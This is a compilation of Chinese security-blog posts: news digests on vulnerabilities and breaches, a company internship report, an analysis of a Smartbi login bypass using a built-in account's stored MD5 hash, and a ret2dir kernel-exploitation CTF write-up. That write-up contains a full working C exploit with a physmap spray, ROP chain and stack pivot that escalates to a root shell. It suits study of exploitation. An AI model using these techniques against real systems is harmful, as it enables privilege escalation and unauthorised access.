1、Atlassian 解决了 Confluence 和 Bamboo 产品中的 3 个严重漏洞 https://securityaffairs.com/148803/security/atlassian-confluence-bamboo-flaws.html Atlassian 解决了其 Confluence Server、Data Center 和 Bamboo Data Center 产品中的三个漏洞，这些漏洞可能导致远程代码执行。 2、攻击者通过Ivanti产品中的零日漏洞入侵了挪威政府部门系统 https://www.bleepingcomputer.com/news/security/norway-says-ivanti-zero-day-was-used-to-hack-govt-it-systems 挪威国家安全局（NSM）证实，攻击者利用Ivanti的产品Endpoint Manager Mobile（EPMM）中的零日漏洞入侵了该国12个政府部门使用的系统。挪威数据保护局（DPA）也收到了有关该事件的通知，表明黑客可能访问了受影响系统的敏感数据，并且可能从中窃取了敏感数据。该漏洞被标记为CVE-2023-35078，是一个身份验证绕过漏洞，影响Ivanti的产品EPMM（ 3、研究人员发现影响AMD Zen2处理器的安全漏洞 https://www.bleepingcomputer.com/news/security/zenbleed-attack-leaks-sensitive-data-from-amd-zen2-processors 研究人员发现了一个影响AMD Zen2 CPU的安全漏洞，该漏洞可能允许攻击者以30KB/秒的速度从每个CPU核心中窃取密码和加密密钥等敏感数据。该漏洞被标记为CVE-2023-20593，是由推测执行期间对名为“vzerooper”的指令的不当处理引起的，这是所有现代处理器中使用的一种常见的性能增强技术。研究人员于2023年5月15日向AMD报告了该漏洞，并于近期发布了CVE 4、研究人员披露Perimeter81产品中的安全漏洞 https://www.securityweek.com/perimeter81-vulnerability-disclosed-after-botched-disclosure-process/ 研究人员在Perimeter81的macOS应用程序中发现本地权限提升漏洞，并披露有关该漏洞的细节。研究人员表示，该权限提升漏洞利用了一个配置错误的XPC服务以及一个命令注入漏洞。利用该漏洞，攻击者可以使用root权限执行任意命令。该漏洞被标记为CVE-2023-33298，Perimeter81 MacOS应用程序的10.0.0.19版本在其com.Perimeter81.osx.HelperT 5、银行业正成为开源软件供应链攻击的目标 https://thehackernews.com/2023/07/banking-sector-targeted-in-open-source.html 网络安全研究人员表示，他们发现了首次专门针对银行业的开源软件供应链攻击。 6、AI 公司承诺将为 AI 生成内容打上水印 https://yro.slashdot.org/story/23/07/21/140215/openai-microsoft-google-meta-and-amazon-pledge-to-watermark-ai-content-for-safety-white-house-says 拜登政府7月21日表示，美国主要 AI 公司如 OpenAI、Alphabet、Meta Platform、亚马逊、Anthropic、Inflection 和微软已经向白宫承诺将自愿为 AI 生成内容实现水印等措施，以帮助提高 AI 技术的安全性。 7、美发布网络安全战略实施计划 https://m.gmw.cn/2023-07/24/content_1303452199.htm 7月中旬，美国国家网络总监办公室公布《国家网络安全战略实施计划》（以下简称《计划》）。《计划》详细阐述了相关职能部门在确保美国网络安全方面的举措和要求，并设定具体时间节点，体现了美国抢占“第五空间”制高点的战略图谋。 8、TETRA 无线电标准漏洞可能会暴露军事通信、工业系统 https://www.securityweek.com/tetra-radio-standard-vulnerabilities-can-expose-military-comms-industrial-systems/ TETRA:BURST – 广泛使用的无线电标准中的漏洞可能会威胁军事和执法通信以及工业控制系统。 9、OPSEC 失误后，朝鲜APT组织在 JumpCloud 黑客攻击活动中暴露 https://thehackernews.com/2023/07/north-korean-nation-state-actors.html 针对 JumpCloud 的入侵发生于 2023 年 6 月 22 日，这是复杂的鱼叉式网络钓鱼活动的一部分，该活动利用未经授权的访问来破坏不到 5 个客户和不到 10 个系统，即所谓的软件供应链攻击。 10、针对阿联酋企业的 Rootkit 攻击大幅增加 https://www.darkreading.com/dr-global/rootkit-attack-detections-increase-uae-businesses 根据卡巴斯基的研究，检测到的针对阿拉伯联合酋长国 (UAE) 商业目标的 Rootkit 攻击尝试显着增加，与 2022 年同期相比，攻击数量增加了 2.6 倍。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

内置账号密码登录 因为自己搭建的环境存在一些问题，可能是版本过高的原因，(奇奇怪怪的问题，用户没有权限)，所以目前仅仅做概念性验证，对漏洞的原理进行分析。 在未登录的情况下访问接口 /smartbi/vision/RMIServlet 我们可以比较明显的看到对应的处理类 CheckIsLoggedFilter smartbi.freequery.filter.CheckIsLoggedFilter#doFilter 从这里开始可能就是要进行比较详细的分析，首先是判断请求的路径是不是/vision/RMIServlet 是的话进入这个分支，然后判断请求体中是不是有以 windowUnloading 开头的字符串，这个跟另一种绕过方式有关，这里先不做分析 接下来依次判断是否有通过 POST 或者 GET 方法来获取参数 className methodName 如果没有的话，就对参数 encode 进行解码，对相关参数进行赋值 ‍ 这里有一个判断，对类和方法进行鉴权操作，如果是 true 就会继续判断是否登录，只需要满足 FilterUtil.needToCheck 返回 false 就可以 smartbi.util.FilterUtil#needToCheck 我们就注意到从数据库登录的操作也是不需要鉴权就可以进行访问的 smartbi.usermanager.UserManagerModule smartbi.usermanager.UserManagerModule#loginFromDB smartbi.usermanager.SecurityServiceImpl#loginFromDB 这里直接比较的是从数据库中查询出的密码，所以我们就可以直接利用内置的账号和 MD5密码登录 admin 也是可以登录成功的 为什么不用原本的登录模式登录，首先原本的登录模式登录是不知道对应的账号和密码的其次我们再对原本的登录逻辑进行简单的分析 smartbi.usermanager.UserManagerModule#clickLogin smartbi.usermanager.UserManagerModule#login smartbi.usermanager.SecurityServiceImpl#login 主要的处理登录逻辑在这一部分 smartbi.usermanager.SecurityServiceImpl#loginDB smartbi.usermanager.UserBO#isPasswordValidate 这里在进行比较的时候 首先 String passwordInLib = this.user.getPassword(); 是从数据库中查找用户的密码，根据用户的密码开头的第一位字符，来进行处理比较 我们已经知道数据库中对应的值是 0a 但是并没有任何一个值对应的 MD5 的值是a 所以正常无法登录内置用户 漏洞修复 http://192.168.222.133:18080/smartbi/vision/sysmonitor.jsp 同样的 POC 已经无法利用成功了，我们关注一下修复的代码内容

前言 ret2dir是2014年在USENIX发表的一篇论文，该论文提出针对ret2usr提出的SMEP、SMAP等保护的绕过。全称为return-to-direct-mapped memory，返回直接映射的内存。 ret2dir 在SMEP与SMAP等用于隔离用户与内核空间的保护出现时，内核中常用的利用手法是ret2usr，如下图所示（图片来自论文）。首先是在内核中找到可以控制指针的漏洞，修改指针使其指向为用户空间，因此在用户空间布置恶意的数据或者代码，完成漏洞的利用。但是当SMEP与SMAP保护的出现，在内核态下，不能够执行或者访问用户空间的代码或者数据，导致了该利用方式失效，因为即使在用户空间中部署了payload，在内核态下也无法访问。因此这种通过显示数据的共享方式已经不再适用了。 所以作者提出了一种思路，能否在内核空间中也能够访问到用户空间的数据。作者最终找到了一段区域，可以隐式的访问用户空间的数据。在内核中存在这部分区域direct mapping of all physical memory，物理地址直接映射区。 这个映射区其实就是内核空间会与物理地址空间进行线性的映射，我们可以在这段区域直接访问到物理地址对应的内容。 那么作者就提出了一种攻击场景，由于在虚地址中的内容最终都会映射到物理地址上，若能将用户空间的数据同样映射到这段区域上，岂不是就可以在内核空间也可以访问到用户空间的数据了。该段区域也被称之为phsymap，它是一段大的，连续的虚拟内存区域，它包含了部分或全部的物理内存的直接映射。下图这种情况作者也称之为是虚拟地址别名的情况，因为在用户空间与内核空间中都存在一个地址可以访问payload。 最终作者构想的攻击场景如下图所示（图片来自论文），不同于ret2usr，指针不再被修改为指向用户空间，而是指向了物理地址的直接映射区，由于该映射区指向物理地址，而在用户空间构造的payload也会映射到物理地址，因此若能获得指向存在payload的用户空间对应的物理地址在phsymap位置，就能够直接执行用户空间的payload。 想要获得映射地址有以下方法 （1）通过读取/proc/pid/pagemap获取，该文件中存放了物理地址与虚拟地址的映射关系，可是该文件需要root权限才能读取。 （2）通过大量覆盖phsymap内存的方法，提高命中率。使用堆喷技术，在该内存区填充大量的payload这样既不会影响payload的执行，又能够提高命中payload的可能性，填充效果如下图 在旧版本的内核中phsymap是具有可执行权限的，因此可以在用户空间中填充shellcode，但是如今的内核版本phsymap已经不具备可执行权限了，因此只能在里面填充ROP链 miniLCTF_2022-kgadget 题目地址：https://github.com/h0pe-ay/Kernel-Pwn/tree/master/miniLCTF_2022 kgadget_ioctl 在kgadget_ioctl中，当我们输入的操作码为0x1BF52时，会将rdx寄存器中的值进行解引用，并且以函数的方式调用该地址，这就导致了任意地址执行。 run.sh 题目提供的run.sh开启了smep与smap的保护，但是没有开启地址随机化KASLR。因此虽然我们可以控制内核执行任意的地址，但是由于题目开启了smep与smap，因此该地址值不能选择为用户空间的地址。 #!/bin/sh qemu-system-x86_64 \ -m 256M \ -cpu kvm64,+smep,+smap \ -smp cores=2,threads=2 \ -kernel bzImage \ -initrd ./rootfs.cpio.gz \ -nographic \ -monitor /dev/null \ -snapshot \ -append "console=ttyS0 nokaslr pti=on quiet oops=panic panic=1" \ -no-reboot \ -s ret2dir利用流程 首先是如何执行我们指定的地址值的，可以看到实际是将我们传入的地址，解引用后存放到rbx寄存器，结果通过将rbx寄存器的值移动到栈顶，从而修改栈顶的值，接着调用ret指令，使得执行被解引用的值。 想要使得内核提权，需要执行commit(prepare_kernel_cred(0)，接着通过swapgs和ret指令的组合。因此需要找到一段内存，将该流程的ROP链填充进去。这是因为kgadget_ioctl并不是执行我们传入进去的地址，而是需要将该地址先解引用后再执行，相当于需要执行传入地址对应的内容。因此若我们直接将commit函数的地址传入进去，它会执行commit函数指向的内容。 那么这段区域需要选取在哪里，若我们直接再用户空间中构造这段payload，接着将用户空间地址传递给ioctl是不可行的，因为内核开启了smap与smep的保护，因此对用户空间的访问都是不被允许的。 因此需要用到ret2dir的技巧，由于用户空间的虚拟地址同样会映射到物理地址，而在内核空间存在一段内存被称之为phsymap，它存放着物理地址的内容，因此我们在用户空间填充的内容，可以在phsymap找到。但是这段内存十分庞大，有64TB的大小，我们怎么才能确保搜索到存放我们payload的地址呢？答案就是尽可能的填充，使得我们用户空间的payload尽可能的大，那么我们搜索到的几率也会增大。 我们以页(4096)为单位开辟内存，并且循环了0x4000次， void copy_dir() { char *payload; payload = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); for (int i = 0; i < 4096; i++) payload[i] = 'z'; } ... int main() {   ...    for(int i = 0; i < 0x4000; i++) copy_dir(); } 可以发现，在用户空间写入的z值，我们在内核空间同样可以访问到。当然写入的次数以及字节数是可以自己人为调整的，可以频繁尝试，尽可能的大的填充，这样我们找到的几率也更大。 当然有时候页的大小页不一定是4096，因此可以使用getconf PAGESIZE获得页的大小 因此我们已经找到能够访问到用户空间payload的内核地址值，接着需要将内核栈的空间迁移到phsymap上，这是因为用原来的内核栈无法使得连续gadget之间的调用。这里修改为测试gadget，用于测试不做栈迁移会发生什么。 unsigned long *payload; payload = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); payload[0] = 0xffffffff8108c6f0; //pop_rdi;ret; payload[1] = 0xffffffff8108c6f0; //pop_rdi;ret; 可以看到执行一次pop rdi; ret，这是因为ret指令会将当前栈顶的值弹出栈，而我们输入的值不再栈上，而是在phsymap上。因此当我们输入的ROP链不再栈上时，就需要使用栈迁移。 由于内核中存在着需要改变rsp寄存器的gadget，只要使用add rsp, xxx; ret即可完成栈迁移。因此需要在栈上填入phsymap的地址，使得经过add rsp, xxx后能够使得rsp指向phsymap。为了使得栈上能够存储phsymap的地址，这里需要借助一个结构体pt_regs。 struct pt_regs { /* * C ABI says these regs are callee-preserved. They aren't saved on kernel entry * unless syscall needs a complete, fully filled "struct pt_regs". */    unsigned long r15;    unsigned long r14;    unsigned long r13;    unsigned long r12;    unsigned long rbp;    unsigned long rbx; /* These regs are callee-clobbered. Always saved on kernel entry. */    unsigned long r11;    unsigned long r10;    unsigned long r9;    unsigned long r8;    unsigned long rax;    unsigned long rcx;    unsigned long rdx;    unsigned long rsi;    unsigned long rdi; /* * On syscall entry, this is syscall#. On CPU exception, this is error code. * On hw interrupt, it's IRQ number: */    unsigned long orig_rax; /* Return frame for iretq */    unsigned long rip;    unsigned long cs;    unsigned long eflags;    unsigned long rsp;    unsigned long ss; /* top of stack page */ }; 可以看到这个结构体存放了一系列的寄存器，这是因为在进行系统调用时，会完成从用户态到内核态的切换，因此需要保存用户态时的上下文寄存器，而这些寄存器的值都需要保存在pt_regs中。使用下述代码测试上述pt_regs结构体存放的位置。 target =  0xffff888000000000 + 0x6000000; __asm( ".intel_syntax noprefix;" "mov r15, 0x15151515;" "mov r14, 0x14141414;" "mov r13, 0x13131313;" "mov r12, 0x12121212;" "mov r11, 0x11111111;" "mov r10, 0x10101010;" "mov r9, 0x99999999;" "mov r8, 0x88888888;" "mov rax, 0x10;" "mov rcx, 0xcccccccc;" "mov rdx, target;" "mov rsi, 0x1BF52;" "mov rdi, fd;" "syscall;" ".att_syntax;" ); 可以看到我们在执行系统调用之前的参数，都会以pt_regs结构体中的顺序进行存放，这里需要注意的是r11寄存器用来存放了rflags的值。 不过出题者在会对pt_regs结构体中的部分寄存器的值进行修改。 最后只剩下r8与r9寄存器是可控的。但是只是用两个寄存器的值就足于完成栈迁移的操作了。 这里可以计算一下栈顶到r9寄存器的距离0xffffc9000021ff98 - 0xffffc9000021fed0 = 0xc8，因此找到add rsp 0xc0的寄存器即可，因为ret指令还会进行一次弹栈操作。这里一开始是使用extract-image.sh进行提取，但是会报错。因此改用vmlinux-to-elf，这个工具提取出的符号比较全。工具的地址为https://github.com/marin-m/vmlinux-to-elf 提取出来就可以愉快的获取gadget。由于没找到add 0xc8的gadget，因此找了个平替的。再结合pop rsp; ret 指令即可完成栈迁移的操作。 add rsp, 0xa8; pop rbx; pop r12; pop rbp; ret; pop rsp; ret; 接着需要考虑堆喷的填充大量内存，因为题目没有开启地址随机化，因此即使不使用堆喷，也能够定位到具体的地址，但是实际情况是该地址可以随机，因此需要确保落入到其他地址也能完成利用。由于第一条指令必须是add rsp, 0xa8; pop rbx; pop r12; pop rbp; ret;，因为需要进行栈迁移。因此在一页的内存中，因使用尽量多的该指令进行填充，确保栈迁移的正常执行。 由于完成提权的payload需要0x58的大小，而该指令会将rsp抬高0xc0，因此用(4096 - 0x58 - 0xc0) / 8 = 0x1dd，因此这里循环复制该指令0x1dd次，接着将剩余空间使用ret指令（常用的堆喷的指令）填充（这里使用了xor esi , esi; ret，因为异或操作不影响。） for (int i = 0; i < 0x1dd; i++) payload[index++] = 0xffffffff81488561; //add rsp, 0xa8; pop rbx; pop r12; pop rbp; ret; for (int i = 0; i < 24; i++) payload[index++] = 0xffffffff81224afc; //xor esi, esi; ret; 最后是在提权时没找到合适gadget将prepare_kernel_cred的返回值即rax寄存器的值，移动到rdi寄存器中。因此学了下出题者的wp，发现出题者使用了init_cred结构体作为commit_creds函数的参数。 init_cred 是 Linux 内核中的一个结构体，用于表示进程的初始凭证。它包含了与进程相关的安全属性和权限信息。，init_cred 结构体通常用于表示初始的 root 凭证。因此只需要借助一个pop rdi;ret的gadget加上init_cred结构体的地址就可以完成root凭证的初始化了。 exp 最后完整的exp如下 #include <stdio.h> #include <fcntl.h> #include <sys/mman.h> #define COLOR_NONE "\033[0m" //表示清除前面设置的格式 #define RED "\033[1;31;40m" //40表示背景色为黑色, 1 表示高亮 #define BLUE "\033[1;34;40m" #define GREEN "\033[1;32;40m" #define YELLOW "\033[1;33;40m" /* 0xffffffff81488561: add rsp, 0xa8; pop rbx; pop r12; pop rbp; ret; 0xffffffff810c92e0: T commit_creds 0xffffffff810c9540: T prepare_kernel_cred 0xffffffff81224afc: xor esi, esi; ret; 0xffffffff8108c6f0: pop rdi; ret; 0xffffffff82a6b700 D init_cred; 0xffffffff81c00fb0 T swapgs_restore_regs_and_return_to_usermode 0xffffffff811483d0: pop rsp; ret; */ int fd; unsigned long user_ss, user_cs, user_sp, user_rflags; unsigned long target; unsigned long target1; void save_state(); void copy_dir(); void back_door(); void back_door() { printf(RED"getshell"); system("/bin/sh"); } void copy_dir() { unsigned long *payload; unsigned int index = 0; payload = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); for (int i = 0; i < 0x1dd; i++) payload[index++] = 0xffffffff81488561; //add rsp, 0xa8; pop rbx; pop r12; pop rbp; ret; for (int i = 0; i < 24; i++) payload[index++] = 0xffffffff81224afc; //xor esi, esi; ret; payload[index++] = 0xffffffff8108c6f0; // pop rdi ret payload[index++] = 0xffffffff82a6b700; //init_cred payload[index++] = 0xffffffff810c92e0; //commit_creds payload[index++] = 0xffffffff81c00fb0 + 0x1b; //swapgs_restore_regs_and_return_to_usermode payload[index++] = 0; payload[index++] = 0; payload[index++] = (unsigned long)back_door; payload[index++] = user_cs; payload[index++] = user_rflags; payload[index++] = user_sp; payload[index++] = user_ss; } void save_state() { __asm( ".intel_syntax noprefix;" "mov user_ss, ss;" "mov user_cs, cs;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ".att_syntax;" ); printf(RED"[*]save state\n"); printf(BLUE"[+]user_ss:0x%lx\n", user_ss); printf(BLUE"[+]user_cs:0x%lx\n", user_cs); printf(BLUE"[+]user_cs:0x%lx\n", user_sp); printf(BLUE"[+]user_rflags:0x%lx\n", user_rflags); printf(RED"[*]save finish\n"); } int main() { save_state(); fd = open("/dev/kgadget", O_RDWR); /* for(int i = 0; i < 0x4000; i++) copy_dir(); */ target =  0xffff888000000000 + 0x6000000; __asm( ".intel_syntax noprefix;" "mov r15, 0x15151515;" "mov r14, 0x14141414;" "mov r13, 0x13131313;" "mov r12, 0x12121212;" "mov r11, 0x11111111;" "mov r10, 0x10101010;" "mov r9, 0xffffffff811483d0;" "mov r8, target;" "mov rax, 0x10;" "mov rcx, 0xcccccccc;" "mov rdx, target;" "mov rsi, 0x1BF52;" "mov rdi, fd;" "syscall;" ".att_syntax;" ); }

1、挪威十二个政府部门网站遭受网络攻击 https://www.jpost.com/breaking-news/article-752214 挪威地方政府和区域发展部在一份声明中表示，挪威12个政府部门网站遭到网络攻击。相关负责人表示，他们在一家供应商的软件中发现了一个新的安全漏洞，并且有不明身份的攻击者利用了该漏洞，目前已经对该漏洞进行修复。此次攻击事件于7月12日被发现，是由于供应商平台中的异常流量所造成的。该负责人暂未提供更多的细节，并表示正在对此次网络攻击事件进行调查，对攻击者进行定性还为时过早。 2、Anonymous Sudan组织声称对OnlyFans进行攻击 https://cybernews.com/security/only-fans-hacked-anonymous-sudan-microsoft-attackers Anonymous Sudan组织在其Telegram频道中声称对OnlyFans网站进行攻击，该组织发布了一张Only Fans网站的截图、有关该网站的描述和一个Check Host链接，以此证明超过四十一个国家在连接该网站的服务器时出现超时情况。Anonymous Sudan组织通常会对受害者进行一到两个小时的DDoS攻击，此次也不例外，该组织称对OnlyFans网站进行持续一个小时的攻击。 3、超过十一万PockerStars用户的数据泄露 https://cybernews.com/news/pokerstars-data-breach PokerStars表示，它成为MOVEit Transfer事件的受害者，攻击者访问了敏感的用户数据。该公司开始向用户通知其数据可能在近期的MOVEit Transfer事件中遭到泄露。该公司表示，他们于6月2日获悉了该漏洞。在外部专家的协助下，得知相关的一些文件可能在5月30日至5月31日期间被未经授权的攻击者窃取。此次数据泄露事件影响了110291位用户，泄露的文件包含个人用户详细信息，包括姓名、地址和社会保障号码。 4、黑客声称窃取明尼苏达大学的数据信息 https://thecyberexpress.com/university-of-minnesota-data-breach 名称为“niggy”的黑客在黑客论坛中称其访问了明尼苏达大学的数据库，并从中窃取了敏感信息，包括超过七万个社会保障号码。该黑客称其访问的数据库中包含自1989年以来记录的数据，该数据库中存储了有关学生、教师和工作人员的敏感信息。泄露的数据包括两个CSV格式的表格，其中的“PS DIVERSITY”用于进行多样性统计，“PS_DWAD_APPL_data_HS”用于进行招生统计。目前该大学未对此次数据泄露事件进行回应。 5、Imagine360证实其数据泄露 https://cybernews.com/security/imagine360-data-breach Imagine360披露了一个影响超过十三万用户的数据泄露事件。该公司发现了第三方文件共享平台内部的异常活动，随即终止了对该平台的访问，并对该活动展开了调查。该公司在表示，一经授权的行为者窃取了Imagine360的数据，泄露的信息包括其用户的姓名、医疗信息、医疗保险信息和社会保障号码。此次数据泄露事件已影响超过十三万名客户。 6、Roblox泄露数千名用户的数据信息 https://www.infosecurity-magazine.com/news/old-roblox-data-leak-resurfaces 在线游戏平台Roblox遭遇数据泄露事件，此次事件影响了数千名用户。泄露的数据以CSV格式发布于黑客论坛中，包含4000个电子邮件地址，以及姓名、用户名、出生日期、电话号码、物理地址和IP地址等个人详细信息。一位知悉此次事件的人士称此次数据泄露事件最初发生于2021年，但当时并未受到过多关注，并且Roblox也未公开提起这起事件。近期相关泄露数据在黑客论坛中重新发布，并引发较多关注，并且已经有受影响的用户开始收到恶意电话、短信和电子邮件。Rob 7、OpenSSH 转发ssh-agent中的一个漏洞允许远程代码执行 https://securityaffairs.com/148770/hacking/openssh-critical-flaw.html Qualys 威胁研究单位 (TRU) 的研究人员在OpenSSH的转发 ssh-agent 中发现了一个远程代码执行漏洞。 8、专家警告银行业可能遭受 OSS 供应链攻击 https://securityaffairs.com/148757/cyber-crime/supply-chain-attack-banking-sector.html Checkmark 研究人员发现了首个针对银行业的已知定向 OSS 供应链攻击。 9、苹果修补了“三角测量行动”攻击中被利用的另一个内核0day漏洞 https://www.securityweek.com/apple-patches-another-kernel-flaw-exploited-in-operation-triangulation-attacks/ 苹果修复了“三角测量操作”漏洞链中使用的另一个零日漏洞。iOS 和 macOS 支持的设备受到影响。 10、Nubeva 的勒索软件密钥拦截和解密技术已在第三方实验室得到验证 https://www.securityweek.com/nubevas-ransomware-key-interception-and-decryption-technology-validated-in-third-party-lab/ NuRR 是一款声称能够在勒索软件加密过程开始时拦截并捕获加密密钥的产品。捕获密钥后，任何成功的加密都可以快速解密，而无需支付赎金。本次测试中使用的勒索软件变体包括 Lockbit 3、Blackcat/ALPHV、CL0P、PLAY、Black Basta、Ragnar Locker、Conti、REvil 等。NuRR 在 MISI 的所有 17 项 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、Lazarus组织针对科技公司开发人员进行攻击活动 https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees GitHub称确定了近期的一项针对科技公司员工个人账户的社会工程学攻击活动，并将此次攻击活动归因于Lazarus组织（又名Jade Sleet）。Lazarus组织在GitHub和其他社交媒体上（包括领英、Slack和Telegram等）创建一个或多个虚假账户来冒充开发者或招聘人员。在与目标建立联系后，攻击者邀请目标在GitHub存储库上进行合作，并说服目标克隆并执行其内 2、僵尸网络利用Zycel中的安全漏洞进行传播 https://www.fortinet.com/blog/threat-research/ddos-botnets-target-zyxel-vulnerability-cve-2023-28771 研究人员检测到几个利用Zycel漏洞（CVE-2023-28771）进行传播的DDoS僵尸网络。该漏洞的特征是存在影响多个防火墙模型的命令注入缺陷，未经授权的攻击者可以通过向目标设备发送特制的数据包来执行任意代码，其CVSS评分为9.8。自漏洞利用代码公布以来，恶意活动持续激增。研究人员发现，从5月开始，攻击活动显著增加，并且还发现了多个僵尸网络，包括基于Mirai的变体Dark.IoT，以及 3、研究人员发现针对Jira插件漏洞的攻击活动 https://isc.sans.edu/diary/Exploit+Attempts+for+Stagil+navigation+for+Jira+Menus+Themes+CVE202326255+and+CVE202326256/30038/ 研究人员发现攻击者正在利用Jira插件中的两个路径遍历漏洞进行攻击活动。这两个高危漏洞于2023年2月被披露，分别被标记为被追踪为CVE-2023-26255和CVE-2023-20256，并在该插件2.0.52版本中得到了解决。攻击者能够利用这些漏洞修改snjCustomDesignConfig和snjFooterNavigationConfi 4、Apache OpenMeetings中存在多个安全漏洞 https://thehackernews.com/2023/07/apache-openmeetings-web-conferencing.html Apache OpenMeetings是一个网络会议工具，该软件近期曝出多个安全漏洞，恶意攻击者可能会利用这些漏洞来夺取管理帐户的控制权，并在易受影响的服务器上运行恶意代码。其中的3个漏洞分别是CVE-2023-28936（CVSS评分：5.3）、CVE-2023-29032（CVSS评分：8.1）、CVE-2023-29246（CVSS评分：7.2）。攻击者可以将应用程序带入意外状态，从而接管管理员帐户，并利用获取的管理员权限进一步利用另一 5、超过15000台Citrix服务器受到CVE-2023-3519的影响 https://www.bleepingcomputer.com/news/security/over-15k-citrix-servers-likely-vulnerable-to-cve-2023-3519-attacks 暴露于网络中的Citrix Netscaler ADC和网关服务器可能容易受到未经身份验证的攻击者利用关键远程代码执行 (RCE) 漏洞作为零日漏洞的攻击。研究人员表示，根据版本信息，至少有15000台设备受到该缺安全漏洞(CVE-2023-3519) 的影响，并且由于一些已知易受攻击但没有版本哈希的修订版没有被标记，因此受到该漏洞影响的服务器总数要更多。 6、恶意的NPM软件包污染jsdelivr CDN服务 https://blog.checkpoint.com/securing-the-cloud/cdn-service-exposes-users-to-malicious-packages-for-phishing-attacks-invisible-to-security-tools jsdelivr是一个免费的开源内容交付网络（CDN），它提供了一种快速可靠的方式来托管和分发文件，使开发人员更容易在其web项目中包含外部库和资源。研究人员在NPM上检测到一个恶意软件包，该软件包中包含一个经过混淆处理的index.js文件，该文件会从jsdelivr CDN服务中获取一个.txt文件，将其 7、DHL 调查 MOVEit 漏洞事件，受害者人数超过 2000 万 https://therecord.media/dhl-moveit-breach-investigation 货运巨头 DHL 的英国分公司表示，正在调查因使用 MOVEit 软件而导致的数据泄露事件。Emsisoft的研究人员一直在追踪受影响的公司数量，发现至少有383家组织受到影响，20,421,414人的信息因此被泄露。 8、Cl0p 团伙通过 MOVEit 漏洞勒索攻击赚取超过 7500 万美元 https://www.bleepingcomputer.com/news/security/clop-gang-to-earn-over-75-million-from-moveit-extortion-attacks/ Clop 勒索软件团伙预计通过勒索大规模 MOVEit 数据盗窃活动的受害者获得7500万美元的收入。 9、事关 5G 安全威胁！CISA 和 NSA 发布最新指南 https://thehackernews.com/2023/07/cisa-and-nsa-issue-new-guidance-to.html 美国网络安全和情报机构发布了一系列建议，以解决 5G 独立网络切片的安全问题，并对可能产生的威胁进行更加有效的防范。 10、CNNVD发布《2022年度网络安全漏洞态势报告》漏洞呈连年增长态势 https://www.freebuf.com/articles/neopoints/372840.html 2022年度新增漏洞近2万5千个，达到历史新高，保持连年增长态势。超高危级漏洞占比呈持续上升趋势，漏洞修复率大幅提升，面临漏洞威胁形势依然严峻。整体形势出现新变化，呈现高风险漏洞数量突破新高、零日争夺凸显攻防新较量、单边漏洞管控扰乱国际秩序、网络霸权主义冲击网空权益等特点，网络安全整体形势更加复杂严峻。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

导语：2023年7月中旬，由中南大学与湖南蚁景科技有限公司共同组织的实习实训圆满结束。 在网络信息技术日新月异的时代背景下，当代大学生对网络安全前沿技术、就业趋势、企业实际用人需求等方面的认知存在一定差距，同时缺乏真正的企业实习实践经历来提升动手能力。在学校老师带队下，由中南大学信息安全专业和计算机科学与技术专业学子组成的实训队伍，走进湖南蚁景科技有限公司，展开了为期三周的实训，近距离感受企业氛围与文化。 实训合影 作为一家专注于网络安全领域的公司，湖南蚁景科技有限公司一直以来都非常重视与高校之间的紧密联系与合作。我们深知，优秀的网络安全专业人才的培养对于行业的发展至关重要。实习实训作为公司与学校间的中间环节，不仅是学生们将理论知识转化为实践能力的重要机会，也是我们公司与高校合作的重要桥梁。 实训期间，我们配备了专业的企业导师、专业的实验课程与实际案例，让学生们能够在实践学习中学习解决问题的能力。导师通俗易懂的授课方式及理论联系实践的操作，让同学们切身体验了网安学习的乐趣。 实训场景 渗透测试岗位让学生们深入了解网络系统的漏洞和安全风险，并通过模拟攻击来测试系统的安全性。而在Web安全岗位上，学生们将学习如何发现和修复网站中的安全漏洞，提供更安全的在线环境。 在表彰大会上，中南大学实训带队老师为本次实训做出总结，表达了对本次实习实训的充分肯定。学生代表上台依次做学习总结。 表彰会现场 本次实习实训的顺利开展，离不开中南大学校方对我司的信任与肯定；我司凭借多年在实习实训方面的丰富经验，已联合多个高校开展此类实习活动。我们期待更多高校加入到校企联合实习实训的队伍中来。 同时，我们也将不断努力提升自身的专业水平，为学生们提供更好的实习实训环境和机会，为网络安全领域的发展贡献我们的力量。

1、BlackCat 和 Clop勒索软件团伙同时入侵了化妆品巨头雅诗兰黛 https://www.freebuf.com/news/372587.html 据BleepingComputer 7月19日消息，化妆品巨头雅诗兰黛最近遭到了来自两个不同勒索软件的攻击。 2、P2PInfec蠕虫针对 Linux和 Windows 系统上的 Redis 服务器 https://securityaffairs.com/148636/malware/p2pinfect-a-rusty-p2p-worm-targets-redis-servers-on-linux-and-windows-systems.html 网络安全研究人员发现了一种名为 P2PInfect 的新点对点 (P2P) 蠕虫，其目标是 Redis 服务器。 3、Adobe紧急更新解决了被利用的 ColdFusion 零日漏洞 https://securityaffairs.com/148625/hacking/coldfusion-zero-day.html Adobe 发布了紧急更新，以解决 ColdFusion 中的关键漏洞，其中包括被积极利用的零日漏洞。 4、新的 AMI BMC 漏洞可导致接管和物理损坏，影响数百万台设备 https://www.securityweek.com/new-ami-bmc-flaws-allowing-takeover-and-physical-damage-could-impact-millions-of-devices/ 固件和硬件安全公司 Eclypsium 披露了其研究人员在 American Megatrends (AMI) MegaRAC 基板管理控制器 (BMC) 